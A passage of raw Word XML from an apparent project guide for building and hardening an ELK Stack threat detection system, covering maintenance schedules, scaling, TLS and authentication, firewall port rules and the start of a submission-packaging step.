            <w:r w:rsidRPr="004536D2">
              <w:t>Reduce latency, batch size optimizations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="1E50A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14F9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🚨</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Review alerts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39C24144" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Daily</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C4E9901" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Validate false positives or missed detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="333270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0793A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🧠</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> Retrain or refine rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="025751FB" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Quarterly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AF0CE97" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Based on new threat patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="311FCDEF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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Helpful tool:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Elastic Snapshot and Restore Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C2C1DE5" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="52B41C0B">
          <v:rect id="_x0000_i1144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3383AC64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📈</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 9.4 — Scalability Enhancements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7935C5" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">If you want your system to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real-world SOC workloads</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>, you can scale 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4275"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="4D33B19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09E50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E960B13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Scaling Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="1C0D83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0D7F4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13D98D46" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Add more data nodes (cluster setup)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="7FD643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A2E14" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Logstash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49168417" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Use multiple pipelines or distributed nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="09DD15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80A25" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Beats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35DA1179" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Deploy agents on more endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="22B4A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4AD8A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Kibana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A023B95" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Enable multiple dashboards for different teams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06D12968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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Elasticsearch Cluster Setup Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="212E1F80" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="62A4B340">
          <v:rect id="_x0000_i1145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B2521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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 9.5 — Security Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4C1C3B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Because this is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cybersecurity project</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>, securing your ELK deployment is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3FAF2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended Security Measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1EF081" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS/SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> for Elasticsearch and Kibana connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD4F7D" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authentication (X-Pack)</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> for admin access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF6B51" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Limit access ports via firewall:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4224D479" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> allow 5601/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19F7FBD4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> allow 9200/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5984ADA2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Regularly patch OS and dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520613D7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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004536D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Elastic Security Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E33FFD6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="637D959C">
          <v:rect id="_x0000_i1146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEAA1B0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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 9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662"/>
        <w:gridCol w:w="2030"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="1987307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9BAD3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E90FAFC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AF95038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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="66320E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A0616" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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2A86C30" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Run system on local/cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="124B1A06" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Docker, Elastic Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="31E56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62FAA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rule Updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503F55D0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Continuous detection tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CBEA39" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>MITRE, Sigma, GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="0CB53A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6972B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs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51422DF4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Keep logs and alerts accurate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E9C19B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Snapshot backups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="753E09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58042" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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5662FCE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Handle larger data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C44C4C7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Multi-node setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="3B548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C22EA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2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ED44B24" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Protect access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41537FA4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>TLS, Auth, Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36016CDF" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="63E16912">
          <v:rect id="_x0000_i1147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA7DDA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🏁</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> End Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B020A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>Once this final step is done —</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:br/>
        <w:t xml:space="preserve">you’ll have a </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fully functioning, production-grade APT Detection System</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> built on ELK Stack that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A1E8F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Detects real attacks (APT samples or simulated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143477E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Visualizes attack patterns in dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A63B3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Alerts security teams instantly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F82F9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Can scale and stay updated with new threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B0E70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🗂️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10 — Final Output, Packaging &amp; Submission Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5BFF2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t>This step ensures that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C177EA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">Your ELK-based APT detection system is </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>well-organized, documented, and easy to run</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E220D0C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">You have </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>submission artifacts</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> (video, report, and code), and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B524F" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">You’re ready for </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>judging, evaluation, and deployment hand-off</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29718F72" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="7D9237A1">
          <v:rect id="_x0000_i1148" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498CDE0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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 10.1 — Folder Structure (Final Layout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751ECC75" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:lastRenderedPageBreak/>
        <w:t>ELK-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>APTGuard</w:t>
      </w:r>
